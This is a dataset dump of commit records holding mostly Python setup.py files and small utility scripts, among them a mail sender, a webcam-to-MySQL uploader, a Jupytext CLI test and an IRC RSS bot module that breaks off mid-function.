commit stringlengths 40 40 | subject stringlengths 1 1.49k | old_file stringlengths 4 311 | new_file stringlengths 4 311 | new_contents stringlengths 1 29.8k | old_contents stringlengths 0 9.9k | lang stringclasses 3 values | proba float64 0 1 |
|---|---|---|---|---|---|---|---|
45e624fe5176dd59b8f42636b777a1b6a6106dca | Add initial setuptools integration, required by click | setup.py | setup.py | # -*- coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
from setuptools import setup
setup(
name='loafer',
version='0.0.1',
entry_points='''
[console_scripts]
loafer=loafer.cli:cli
''',
)
| Python | 0 | |
81e7e9ed4b3b0f6840e11adc5c73648471f606ef | Add setup.py | setup.py | setup.py | # coding: utf-8
from __future__ import print_function, unicode_literals
import sys
from setuptools import setup
install_requires = []
if sys.version_info[0] == 2:
install_requires.append('statistics')
setup(
name='scrapy-slotstats',
version='0.1',
license='MIT License',
description='Scrapy extension to show statistics of downloader slots',
author='orangain',
author_email='orangain@gmail.com',
url='https://github.com/orangain/scrapy-slotstats',
keywords="scrapy downloader slot stats",
py_modules=['scrapy_slotstats'],
platforms=['Any'],
install_requires=install_requires,
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Framework :: Scrapy',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
]
)
| Python | 0.000001 | |
21380bcf76a8144d182166c3441d308af2eda417 | Add first pass at setup.py | setup.py | setup.py | #!/usr/bin/python
import os
from distutils.core import setup, Extension
ext_modules = []
packages = ['bayesdb', 'bayesdb.tests']
setup(
name='BayesDB',
version='0.1',
author='MIT.PCP',
author_email = 'bayesdb@mit.edu',
url='probcomp.csail.mit.edu/bayesdb',
long_description='BayesDB',
packages=packages,
package_dir={'bayesdb':'bayesdb/'},
ext_modules=ext_modules,
)
| Python | 0 | |
374e27087d6d432ba01a0ef65c4109be84e50dcf | Add setup.py | setup.py | setup.py | import os
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
try:
from distutils.command.build_py import build_py_2to3 as build_py
except ImportError:
from distutils.command.build_py import build_py
path, script = os.path.split(sys.argv[0])
os.chdir(os.path.abspath(path))
# Don't import rjmetrics module here, since deps may not be installed
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'rjmetrics'))
from version import VERSION
install_requires = ['requests >= 0.8.8']
# Get simplejson if we don't already have json
if sys.version_info < (3, 0):
try:
from util import json
except ImportError:
install_requires.append('simplejson')
setup(
name='rjmetrics',
cmdclass={'build_py': build_py},
version=VERSION,
description='Python client for RJMetrics APIs',
author='RJMetrics',
author_email='support@rjmetrics.com',
url='https://rjmetrics.com/',
packages=['rjmetrics', 'rjmetrics.test'],
package_data={'rjmetrics': ['../VERSION']},
install_requires=install_requires,
test_suite='rjmetrics.test.all',
use_2to3=True,
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Libraries :: Python Modules",
])
| Python | 0.000001 | |
9c05031446d0d17bdc207b00ebf47d9769f96d33 | Add a setup.py for owebunit to be able to obtain ocookie via pip | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
setup(name='ocookie',
version='0.1',
description='Comprehensive cookie library',
author='Oleg Pudeyev',
author_email='oleg@bsdpower.com',
url='http://github.com/p/ocookie',
packages=['ocookie'],
)
| Python | 0 | |
431acaabf7a3e77b416a57998bfadcb2d3864555 | Add a setup.py | setup.py | setup.py | from setuptools import setup, find_packages
import codecs
import os
import re
setup(
name="httpbin",
version="0.1.0",
description="HTTP Request and Response Service",
# The project URL.
url='https://github.com/kennethreitz/httpbin',
# Author details
author='Kenneth Reitz',
author_email='me@kennethreitz.com',
# Choose your license
license='MIT',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
],
packages=find_packages(),
install_requires=['Flask','MarkupSafe','decorator','itsdangerous','six'],
)
| Python | 0 | |
82b8651c9eed0c19224c8a7b53a0bedae81337a3 | Add a setup.py. | setup.py | setup.py |
from setuptools import setup, find_packages
setup(
name = "WebStar",
version = "0.1b",
author="Mike Boers",
author_email="webstar@mikeboers.com",
license="BSD-3"
)
| Python | 0 | |
d157b4e1f4709b0205d5de31df65a5308f926d49 | Add setup.py | setup.py | setup.py | #!/usr/bin/env python
# coding: utf-8
import re
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
version = ""
with open("autumn.py", "r") as f:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
f.read(), re.MULTILINE).group(1)
if not version:
raise RuntimeError("No version information")
setup(name="autumn",
version=version,
description="A simple Pythonic MySQL ORM.",
author="ushuz",
url="https://github.com/ushuz/autumn",
py_modules=["autumn"],
license="MIT License",
)
| Python | 0.000001 | |
a2bfe07ba67e902870dd366626b23dbb5e6e2696 | Create messageMode.py | messageMode.py | messageMode.py |
#!/usr/bin/python
#coding=utf-8
#filename: messageMode.py
import telnetlib
import os,sys,commands,multiprocessing
import smtplib
import time
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
import urllib2
#---init---
begintime = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
muti_phone='13521161000'
muti_mail='yhf@XXXX.com'
pythonlog ='/home/sms_mail.log'
sender = 'hxx@163.com'
smtpserver = 'hxx.163.com'
username = 'hxx@163.com'
password = 'password'
#----------
def sendtxtmail(_subject,_mail_off,_msg,_fuc_mail,_begintime):
for mail_index in range(0, len(_fuc_mail.split(';'))):
if _mail_off == 1:
break
_receiver = _fuc_mail.split(';')[mail_index]
if _receiver.find('null') == -1:
try:
msg = MIMEText('<html>'+_msg+'</html>','html','utf-8')
msg['Subject'] = _subject
msg['to'] = _receiver
smtp = smtplib.SMTP()
smtp.connect(smtpserver)
smtp.login(username, password)
smtp.sendmail(sender,_receiver, msg.as_string())
smtp.quit()
os.system("echo "+_begintime+' '+_subject+' '+_receiver+" mail send successful >> "+pythonlog)
print "mail send successful"
except Exception,e:
print "mail send fail"
print e[1]
os.system("echo "+_begintime+' '+_subject+' '+_receiver+" mail send fail ,Code: "+str(e[0])+' '+e[1].split()[0]+'- -! >>'+pythonlog)
return 'mail func over'
def main(arg_msg):
sendtxtmail('test_subject',0,arg_msg,muti_mail,begintime)
return 'main func over'
if __name__ == "__main__":
print main(sys.argv[1])
| Python | 0.000001 | |
3d020f09332093807f70a1bca5360e1418633bb4 | Add setup.py. | setup.py | setup.py | from setuptools import setup, find_packages
setup(name='Anytask',
packages=find_packages(),
)
| Python | 0 | |
b38eb4f8a7b8e3400ea09c600e241d8c4a9d0846 | Add setup so sgfs can install this to test with | setup.py | setup.py | from distutils.core import setup
setup(
name='sgsession',
version='0.1-dev',
description='Shotgun ORM/Session.',
url='http://github.com/westernx/sgsession',
packages=['sgsession'],
author='Mike Boers',
author_email='sgsession@mikeboers.com',
license='BSD-3',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Topic :: Software Development :: Libraries :: Python Modules',
],
) | Python | 0 | |
5263a684d4bd111b903456a8da2c92ddb25e7811 | Add migration | seriesly/series/migrations/0002_auto_20180127_0718.py | seriesly/series/migrations/0002_auto_20180127_0718.py | # Generated by Django 2.0 on 2018-01-27 13:18
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('series', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='show',
name='added',
field=models.DateTimeField(default=django.utils.timezone.now),
),
migrations.AlterField(
model_name='show',
name='country',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='show',
name='network',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='show',
name='timezone',
field=models.CharField(blank=True, max_length=255),
),
]
| Python | 0.000002 | |
874fbb6749d60ea3fcf078d25d7911d7ac314ab1 | Add a setup.py file for use with python install tools. | setup.py | setup.py | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
config = {
'description': 'File validator',
'author': 'Iestyn Pryce',
'url': '',
'download_url': '',
'author_email': 'iestyn.pryce@gmail.com',
'version': '0.1',
'install_requires': ['nose'],
'packages': ['validator'],
'scripts': ['bin/validate_file.py'],
'name': 'validator'
}
setup(**config)
| Python | 0 | |
3258a5ba8c748ce079082c34d13b231f157b1463 | Add experimental top-level copy of setup.py | setup.py | setup.py | #!/usr/bin/env python
# Original libphonenumber Java code:
# Copyright (C) 2009-2011 The Libphonenumber Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import distutils.core
import sys
# Importing setuptools adds some features like "setup.py test", but
# it's optional so swallow the error if it's not there.
try:
import setuptools
except ImportError:
pass
major, minor = sys.version_info[:2]
python_25 = (major > 2 or (major == 2 and minor >= 5))
if not python_25:
raise RuntimeError("Python 2.5 or newer is required")
python_3x = (major >= 3)
if python_3x:
package_name = 'phonenumbers3k'
dev_status = 'Development Status :: 3 - Alpha'
else:
package_name = 'phonenumbers'
dev_status = 'Development Status :: 4 - Beta'
# Add ./python/ subdirectory to path
sys.path.append('python')
# Discover version of phonenumbers package
from phonenumbers import __version__
distutils.core.setup(name=package_name,
version=__version__,
description="Python version of Google's common library for parsing, formatting, storing and validating international phone numbers.",
author='David Drysdale',
author_email='dmd@lurklurk.org',
url='https://github.com/daviddrysdale/python-phonenumbers',
license='Apache License 2.0',
packages=['phonenumbers', 'phonenumbers.data', 'phonenumbers.geodata'],
package_dir={'': 'python'},
test_suite="tests",
platforms='Posix; MacOS X; Windows',
classifiers=[dev_status,
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Topic :: Communications :: Telephony',
],
)
| Python | 0 | |
58dd2d188aab1fbf30ff843307eecf5ca685527c | Add setup | setup.py | setup.py | from setuptools import find_packages, setup
setup(
name='ngx-task',
version='0.1',
description='Testimonial for candidates to show up their code-foo',
author='Dmitry Shulyak',
author_email='dmitri.shulyak@gmail.com',
url='https://github.com/shudmi/ngx-task',
classifiers=[
'License :: Apache License 2.0',
'Programming Language :: Python',
'Programming Language :: Python 3',
'Programming Language :: Python 3.4',
],
packages=find_packages(exclude=['tests', 'tests.*']),
install_requires=[],
entry_points="""
[console_scripts]
ngx_generate=ngx_task.cli.generate_data
ngx_process=ngx_task.cli.process_data
"""
)
| Python | 0.000001 | |
90746eba08c67c4f62462ed74d08566cafa18724 | Add setup.py | setup.py | setup.py | #!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name='wrenet',
version='0.1',
description='Network configurations viewer in the Windows Registry',
author='graypawn',
author_email='choi.pawn' '@gmail.com',
url='https://github.com/graypawn/wrenet',
license='Apache License (2.0)',
packages=find_packages(),
install_requires = {'python-registry >= 1.0.0'},
classifiers = ["Programming Language :: Python",
"Programming Language :: Python :: 3",
"Operating System :: POSIX :: Linux",
"License :: OSI Approved :: Apache Software License"],
entry_points={
'console_scripts': [
'wrenet=wrenet.wrenet:main'
]
}
)
| Python | 0.000001 | |
50742b6e629e6f54a9f3784a3c1495eb9d82c238 | Add start of processed package | brightway_projects/processing/processed_package.py | brightway_projects/processing/processed_package.py | from ..errors import InconsistentFields, NonUnique
def greedy_set_cover(data, exclude=None):
"""Find unique set of attributes that uniquely identifies each element in ``data``.
Feature selection is a well known problem, and is analogous to the `set cover problem <https://en.wikipedia.org/wiki/Set_cover_problem>`__, for which there is a `well known heuristic <https://en.wikipedia.org/wiki/Set_cover_problem#Greedy_algorithm>`__.
Args:
data (iterable): List of dictionaries with the same fields.
exclude (iterable): Fields to exclude during search for uniqueness. ``id`` is Always excluded.
Returns:
Set of attributes (strings)
Raises:
NonUnique: The given fields are not enough to ensure uniqueness
"""
if exclude is None:
exclude = {"id"}
else:
exclude = set(exclude)
exclude.add("id")
def as_unique_attributes(data, exclude=None, include=None):
"""Format ``data`` as unique set of attributes and values for use in ``create_processed_datapackage``.
Note: Each element in ``data`` must have the attributes ``id``.
data = [
{},
]
Args:
data (iterable): List of dictionaries with the same fields.
exclude (iterable): Fields to exclude during search for uniqueness. ``id`` is Always excluded.
include (iterable): Fields to include when returning, even if not unique
Returns:
(list of field names as strings, dictionary of data ids to values for given field names)
Raises:
InconsistentFields: Not all features provides all fields.
"""
include = set([]) if include is None else set(include)
fields = greedy_set_cover(data, exclude)
if len({set(obj.keys()) for obj in data}) > 1:
raise InconsistentFields
def formatter(obj, fields, include):
return {
key: value
for key, value in obj.items()
if (key in fields or key in include or key == "id")
}
return (fields, [formatter(obj, fields, include) for obj in data])
def create_processed_datapackage(
array,
rows,
cols,
filepath=None,
id_=None,
metadata=None,
replace=True,
compress=True,
in_memory=False,
):
"""Create a datapackage with numpy structured arrays and metadata.
Exchanging large, dense datasets like MRIO tables is not efficient if each exchange must be listed separately. Instead, we would prefer to exchange the processed arrays used to build the matrices directly. However, these arrays use integer indices which are not consistent across computers or even Brightway projects. This function includes additional metadata to solve this problem, mapping these integer ids to enough attributes to uniquely identify each feature. Separate metadata files are included for each column in the array (i.e. the row and column indices).
Args:
array (numpy structured array): The numeric data. Usually generated via ``create_numpy_structured_array``.
rows (dict): Dictionary mapping integer indices in ``row_value`` to a dictionary of attributes.
cols (dict): Dictionary mapping integer indices in ``col_value`` to a dictionary of attributes.
Returns:
Something :)
"""
pass
| Python | 0 | |
c68cda0549bb9c47be0580ecd43f55966e614b31 | Add Pascal's Triangle/nCr Table | mathematics/combinatorics/ncr_table/kevin.py | mathematics/combinatorics/ncr_table/kevin.py | #!/usr/bin/env python
# https://www.hackerrank.com/challenges/ncr-table
def get_number():
return int(input().strip())
def nCr(row_number):
rows = [[1], [1, 1], [1, 2, 1]]
while row_number >= len(rows):
# 1
# 1 1
# 1 2 1
# 1 4 4 1
# .......
row = [(rows[-1][index] + rows[-1][index + 1])
for index in range(len(rows) - 1)]
rows.append([1] + row + [1])
# Spew elements with * to show the proper output
print(*rows[row_number])
# Generate this row from the nCr table
inputs = []
number_of_items = get_number()
for i in range(number_of_items):
pascals_row = get_number()
inputs.append(pascals_row)
print()
[nCr(item) for item in inputs]
| Python | 0.000004 | |
842869063ead9b2e6a1e22d11c9901072f2319aa | Add script to self generate docs for recurring data types | docs/generate_spec.py | docs/generate_spec.py | # -*- encoding: utf-8 -*-
#
# This script is to be used to automagically generate the recurring data types
# documentation based on the API specification.
#
# to run it just do:
#
# $ python generate_spec.py > outputfile.md
#
# :authors: Arturo Filastò
# :licence: see LICENSE
import inspect
from globaleaks.rest.messages import base
def create_spec(spec):
doc = ""
for k, v in spec.items():
doc += " %s: %s\n" % (k, v)
return doc
def create_class_doc(klass):
doc = "## %s\n" % klass.__name__
if klass.__doc__:
docstring = [line.strip() for line in klass.__doc__.split("\n")]
doc += '\n'.join(docstring)
doc += "\n"
doc += create_spec(klass.specification)
return doc
for name, klass in inspect.getmembers(base, inspect.isclass):
if issubclass(klass, base.GLTypes) and klass != base.GLTypes:
print create_class_doc(klass)
| Python | 0 | |
7d23ad49da0044d83f781105cb01addb1a4aa41c | Add catalog.wsgi file | catalog.wsgi | catalog.wsgi | #!/usr/bin/python
import sys
sys.path.insert(0,"/var/www/html/catalog/")
from catalog import app as application
application.secret_key = 'super_secret_key'
| Python | 0 | |
dd5ae6788b4bb3630c16ce0996b206ae5e26228f | Extract env seq | scripts/extract_paths.py | scripts/extract_paths.py | import glob
import sys
import avidaspatial
num = sys.argv[1]
env_id = sys.argv[2]
filenames = glob.glob("*"+env_id+"*/lineage_locs_"+num+".dat")
env = avidaspatial.parse_environment_file("../config/env"+env_id+".cfg", (60, 60))
outfile = open("paths_"+num+"_"+env_id+".dat", "w")
outfile_env = open("env_seq_"+num+"_"+env_id+".dat", "w")
for name in filenames:
infile = open(name)
path = infile.readline().split()[1:-1]
infile.close()
path = [int(i) for i in path]
path = [[i % 60, i // 60] for i in path]
outfile.write(str(path) + "\n")
env_seq = []
for loc in path:
env_seq.append(sorted(list(env[loc[1]][loc[0]])))
outfile_env.write(",".join([str(i) for i in env_seq]) + "\n")
outfile.close()
outfile_env.close()
| import glob
import sys
import avidaspatial
num = sys.argv[1]
env = sys.argv[2]
filenames = glob.glob("*"+env+"*/lineage_locs_"+num+".dat")
env = avidaspatial.parse_environment_file("../config/env"+env+".cfg", (60, 60))
outfile = open("paths_"+num+"_"+env+".dat", "w")
outfile_env = open("env_seq_"+num+"_"+env+".dat", "w")
for name in filenames:
infile = open(name)
path = infile.readline().split()[1:-1]
infile.close()
path = [int(i) for i in path]
path = [[i % 60, i // 60] for i in path]
outfile.write(str(path) + "\n")
env_seq = []
for loc in path:
env_seq.append(sorted(list(env[loc[1]][loc[0]])))
outfile_env.write(",".join([str(i) for i in env_seq]) + "\n")
outfile.close()
outfile_env.close()
| Python | 0.999944 |
c16fae0519068e40d7b1ed988f49460198f6fd43 | Create decode_diameter.py | decode_diameter.py | decode_diameter.py | #-------------------------------------------------------------------------------
# Name: Decode Diameter
# Purpose:
#
# Author: XIAO Zhen
#
# Created: 08/10/2014
# Copyright: (c) XIAO Zhen 2014
# Licence: MIT License
#-------------------------------------------------------------------------------
#!/usr/bin/env python
import os
import sys
def logerr(msg):
print "Error: " + msg
def loginfo(msg):
print "Info : " + msg
def output(msg):
print msg
def loadAvpDefineFile(filename):
d = dict()
try:
file = open(filename,'r')
except:
logerr("Cannot open file:" + filename)
return d
cur_avp = '-1'
detail = []
for line in file.readlines():
if(line[:4] == 'avp '):
if(cur_avp != '-1'):
d[cur_avp] = detail
detail = []
cur_avp = line.split()[1]
if(cur_avp in d):
cur_avp = '-1'
elif(line.find("VENDOR_ID") != -1 and cur_avp != '-1'):
cur_avp += ':' + line.split()[2][:-1]
elif(line.find('DATA_TYPE') != -1):
detail.append(line.split()[2][:-1])
elif(line.find('AVP_NAME') != -1):
detail.append(line.split()[2][1:-2])
file.close()
return d
def decode(avps,hex):
'''
0. Grouped
1. OctetString
2. OctetString
3. Int32
4. Int64
5. UInt32
6. UInt64
9. Address
10.Time
11.Diameter-Identify
12.DiameterURI
13.Enum
459:0
['13', 'User-Equipment-Info-Type']
'''
i = 0
if(hex[i:i + 2] != '01'):
logerr("This is not a diameter message!")
return
i += 2
offset = []
offset.append(eval('0x' + hex[i:i+6]) - 8)
def main():
#use the the directory where the script located as current work dir
os.chdir(os.path.dirname(sys.argv[0]))
#load the avp define file
file_name_avp_define = "Avpdefine.avp"
avps = loadAvpDefineFile(file_name_avp_define)
i = 0
for avp in avps:
print avp
print avps[avp]
i += 1
if(i == 10):
break
hex = '-'
decode(avps,hex)
if __name__ == '__main__':
main()
| Python | 0.000327 | |
8968251b7e1b89171b285e377d17dae299019cd0 | Test that '--checks' accepts notebooks either before or after the check command (#887) | tests/test_cli_check.py | tests/test_cli_check.py | import pytest
from nbformat.v4.nbbase import new_code_cell, new_notebook
from jupytext import write
from jupytext.cli import jupytext
from .utils import requires_black
@pytest.fixture
def non_black_notebook(python_notebook):
return new_notebook(metadata=python_notebook.metadata, cells=[new_code_cell("1+1")])
@requires_black
def test_check_notebooks_left_or_right_black(python_notebook, tmpdir, cwd_tmpdir):
write(python_notebook, str(tmpdir / "nb1.ipynb"))
write(python_notebook, str(tmpdir / "nb2.ipynb"))
jupytext(["*.ipynb", "--check", "black --check {}"])
jupytext(["--check", "black --check {}", "*.ipynb"])
@requires_black
def test_check_notebooks_left_or_right_not_black(
non_black_notebook, tmpdir, cwd_tmpdir
):
write(non_black_notebook, str(tmpdir / "nb1.ipynb"))
write(non_black_notebook, str(tmpdir / "nb2.ipynb"))
with pytest.raises(SystemExit):
jupytext(["*.ipynb", "--check", "black --check {}"])
with pytest.raises(SystemExit):
jupytext(["--check", "black --check {}", "*.ipynb"])
| Python | 0 | |
4694f6bf2405d0aae5e6c3fc393f8a839e8aac07 | Add tests for converter.Line and converter.Generator. | tests/test_converter.py | tests/test_converter.py | # coding: utf-8
# Copyright (c) 2010-2012 Raphaël Barrois
import unittest
from confmgr import converter
class LineTestCase(unittest.TestCase):
def test_repr(self):
self.assertEqual("Line('foo', 'bar')",
repr(converter.Line('foo', 'bar')))
def test_equality(self):
self.assertEqual(
converter.Line('foo', 'bar'),
converter.Line('foo', 'bar'))
self.assertNotEqual(
converter.Line('foo', 'bar'),
converter.Line('foo', 'baz'))
self.assertNotEqual(
converter.Line('foo', 'bar'),
converter.Line('fo', 'bar'))
def test_compare_to_other(self):
self.assertNotEqual('foo', converter.Line('foo', 'bar'))
self.assertNotEqual(converter.Line('foo', 'bar'), 'foo')
def test_hash(self):
s = set()
for _i in range(5):
s.add(converter.Line('foo', 'bar'))
self.assertEqual(1, len(s))
self.assertEqual(set([converter.Line('foo', 'bar')]), s)
def test_fill_original_normal(self):
l = converter.Line('foo', None)
self.assertEqual(None, l.original)
l.fill_original()
self.assertEqual('foo', l.original)
def test_fill_original_comment(self):
l = converter.Line('#@foo', None)
self.assertEqual(None, l.original)
l.fill_original()
self.assertEqual('#@@foo', l.original)
l = converter.Line('"@foo', None)
self.assertEqual(None, l.original)
l.fill_original()
self.assertEqual('"@@foo', l.original)
l = converter.Line('!@foo', None)
self.assertEqual(None, l.original)
l.fill_original()
self.assertEqual('!@@foo', l.original)
class GeneratorTestCase(unittest.TestCase):
def test_no_special(self):
txt = [
'foo',
'bar',
'baz',
]
g = converter.Generator(txt, categories=[], fs=None)
expected = [converter.Line(s, s) for s in txt]
out = list(g)
self.assertItemsEqual(expected, out)
if __name__ == '__main__':
unittest.main()
| Python | 0 | |
a37640d107d1dd58ba4f9db3e043020ad76cd25d | Create cam_control.py | cam_control.py | cam_control.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from cv2 import *
import MySQLdb as ms
import time
import _mysql_exceptions as M
import os
def get_image():
cam1 = VideoCapture(0)
cam2 = VideoCapture(1)
s1, img1 = cam1.read()
s2, img2 = cam2.read()
if s1:
imwrite("test1.jpg",img)
if s2:
imwrite("test2.jpg",img)
def read_image():
fin1 = open("test1.jpg")
fin2 = open("test2.jpg")
img1 = fin1.read()
img2 = fin2.read()
return img1,img2
def query() :
try :
db = ms.connect(host="your_host_name",user="your_user_name",\
passwd="your_password",db="your_database_name")
except(M.OperationalError):
print '\n', "########ISSUE_%s_Mysqldatabase_########" % ("your_host_name")
print "########RPi_CANT_REACH_DATABASE########"
print "########CHECK_WIRES_FROM_RPI_TO_INTERNETPROVIDER'S_ROOTER(BOX)##"
os.system("sudo reboot")
data1 = read_image()[0]
data2 = read_image()[1]
try :
#set up of a cursor to be able to execute a query in database.
c = db.cursor()
date = time.strftime("%a, %d, %b %Y %H:%M:%S", time.gmtime())
c.execute("INSERT INTO images(date,cam1,cam2) VALUES (%s,%s,%s)", (date,data1,data2))
print "<--- Send image --->","--- / date / --- : ",date
except(NameError) :
#os.system("sudo reboot")
print "NameError: ", NameError
if __name__ == "__main__" :
while True :
get_image()
try :
query()
#print "Ok test.jpg image found"
except :
print "No test.jpg image found"
#cam get .jpg file and send an image \
#every 30 minutes=1800 seconds
#every 5minutes = 300 seconds
time.sleep(300)
| Python | 0.000001 | |
d2a283856a9e2559a131c5aaa2407477be993af0 | add file to help gather all the data we need | collate.py | collate.py | import csv
from glob import glob
def collate_from_breath_meta(cohort):
"""
Gets all breath_meta.csv files in our specific cohort and then gets all
the data from these files and stores them in a dictionary.
"""
if cohort not in ["ardscohort", "controlcohort"]:
raise Exception("Input must either be ardscohort or controlcohort")
dirs = os.listdir(cohort)
cohort_files = []
for dir in dirs:
files = glob("{}/{}/0*_breath_meta.csv".format(cohort, dir))
for f in files:
cohort_files.append(f)
data = []
for f in cohort_files:
with open(f) as meta:
reader = csv.reader(meta)
for line in reader:
data.append(line)
return data
if __name__ == "__main__":
main()
| Python | 0 | |
d2667faded6dfdd1fb2992ec188b8fed12bb2723 | Add ncurses 5.9 | packages/ncurses.py | packages/ncurses.py | class NcursesPackage (GnuPackage):
def __init__ (self):
GnuPackage.__init__ (self, 'ncurses', '5.9')
self.sources.extend ([
'https://trac.macports.org/export/136235/trunk/dports/devel/ncurses/files/hex.diff',
'https://trac.macports.org/export/136235/trunk/dports/devel/ncurses/files/ungetch_guard.diff',
'https://trac.macports.org/export/136235/trunk/dports/devel/ncurses/files/configure.diff',
'https://trac.macports.org/export/136235/trunk/dports/devel/ncurses/files/constructor_types.diff',
'https://trac.macports.org/export/136235/trunk/dports/devel/ncurses/files/pkg_config_libdir.diff'
])
def prep (self):
Package.prep (self)
if Package.profile.name == 'darwin':
for p in range (1, len (self.sources)):
self.sh ('patch -p0 --ignore-whitespace < "%{sources[' + str (p) + ']}"')
def make (self):
self.local_make_flags.extend (['-DPKG_CONFIG_LIBDIR=%s' % self.PKG_CONFIG_PATH])
Package.make (self)
NcursesPackage ()
| Python | 0.000015 | |
00bfd02f921a42d4f288254d1accb7546d8df2c5 | Add hbase consistency check throw hbase hbck command, easily can be added some checks like backups servers or region servers | check_hbase.py | check_hbase.py | #!/usr/bin/env python
# vim: ts=4:sw=4:et:sts=4:ai:tw=80
from utils import krb_wrapper,StringContext
import os
import argparse
import nagiosplugin
import re
import subprocess
html_auth = None
def parser():
version="0.1"
parser = argparse.ArgumentParser(description="Checks datanode")
parser.add_argument('-p', '--principal', action='store', dest='principal')
parser.add_argument('-s', '--secure',action='store_true')
parser.add_argument('-k', '--keytab',action='store')
parser.add_argument('--cache_file',action='store', default='/tmp/nagios.krb')
parser.add_argument('-v','--version', action='version', version='%(prog)s ' + version)
args = parser.parse_args()
if args.secure and (args.principal is None or args.keytab is None):
parser.error("if secure cluster, both of --principal and --keytab required")
return args
class Hbase(nagiosplugin.Resource):
def __init__(self):
p = subprocess.Popen(['hbase','hbck'],stdout=subprocess.PIPE,stderr=None)
output,err = p.communicate()
self.status=None
if err is None:
for line in output.splitlines():
m = re.match('^\s*Status\s*:\s*(?P<STATUS>\w+)\s*',line)
if m:
self.status=m.group('STATUS')
else:
return 2,"Critical: "+err
def probe(self):
yield nagiosplugin.Metric('status',self.status,context="status")
@nagiosplugin.guarded
def main():
args = parser()
if args.secure:
auth_token = krb_wrapper(args.principal,args.keytab,args.cache_file)
os.environ['KRB5CCNAME'] = args.cache_file
check = nagiosplugin.Check(Hbase(),
StringContext('status',
'OK'))
check.main()
if auth_token: auth_token.destroy()
if __name__ == '__main__':
main()
| Python | 0 | |
f865bf2d7365ccecec07be7e51e8d81676f3aae2 | Add check_cycles tests module | tests/plantcv/morphology/test_check_cycles.py | tests/plantcv/morphology/test_check_cycles.py | import cv2
from plantcv.plantcv import outputs
from plantcv.plantcv.morphology import check_cycles
def test_check_cycles(morphology_test_data):
# Clear previous outputs
outputs.clear()
mask = cv2.imread(morphology_test_data.ps_mask, -1)
_ = check_cycles(mask)
assert outputs.observations['default']['num_cycles']['value'] == 16
| Python | 0 | |
1ab296398aaa796a9a5b620c4281d9376ada8b3e | Add short script which prints the entire CMIP6 MIP experiment list #197. | ece2cmor3/scripts/mip-experiment-list.py | ece2cmor3/scripts/mip-experiment-list.py | #!/usr/bin/env python
# Thomas Reerink
#
# Run example:
# python mip-experiment-list.py
#
# Looping over all MIPs and within each MIP over all its MIP experiments.
# Printing the MIP experiment list with some additional info.
#
from dreqPy import dreq
dq = dreq.loadDreq()
mip_list_file= open( 'mip-experiment-list.txt', 'w' )
# Loop over the MIPs:
for mip in dq.coll['mip'].items:
# Loop over the MIP experiments:
for u in dq.inx.iref_by_sect[mip.uid].a['experiment']:
ex = dq.inx.uid[u]
mip_list_file.write( '{:20} {:20} {:30} {:3} {}'.format(mip.label, ex.mip, ex.label, ex.tier[0], ex.title) + '\n')
#print '{:20} {:20} {:30} {:3} {}'.format(mip.label, ex.mip, ex.label, ex.tier[0], ex.title)
mip_list_file.close()
| Python | 0 | |
6d6edeb5e1acfdc3dce2660d128a0bbf05203d87 | add rss module | modules/rss.py | modules/rss.py | # -*- coding: ISO-8859-15 -*-
import md5, time
from xml.dom import minidom
from twisted.internet import reactor
from twisted.internet.defer import inlineCallbacks
from twisted.web import client
from core.Uusipuu import UusipuuModule
class Module(UusipuuModule):
    """IRC RSS watcher: polls configured feeds and announces new items.

    Feed definitions live in self.config['feeds'] (name -> {url, interval,
    optional filter}); already-seen items are kept per feed in self.items
    for the lifetime of the session.
    """

    def startup(self):
        """Ensure the feed config exists and start polling every feed."""
        if 'feeds' not in self.config or \
            type(self.config['feeds']) != type({}):
            self.config['feeds'] = {}
        self.items = {}
        for feed in self.config['feeds']:
            self.items[feed] = []
            self.query_feed(feed)

    def cmd_rssreset51515(self, user, replyto, params):
        """Debug command: drop the first stored item whose title matches."""
        name = params.strip()
        for feed in self.items:
            # Iterate over a copy so removal is safe while looping.
            for item in self.items[feed][:]:
                if item['title'] == name:
                    self.items[feed].remove(item)
                    self.chanmsg('Ok, removing an item')
                    return
        self.chanmsg('No items found :(')

    def cmd_rss(self, user, replyto, params):
        """Entry point for !rss; dispatches to the matching do_* handler."""
        pieces = params.strip().split(' ', 1)
        if not len(pieces) or not len(pieces[0]):
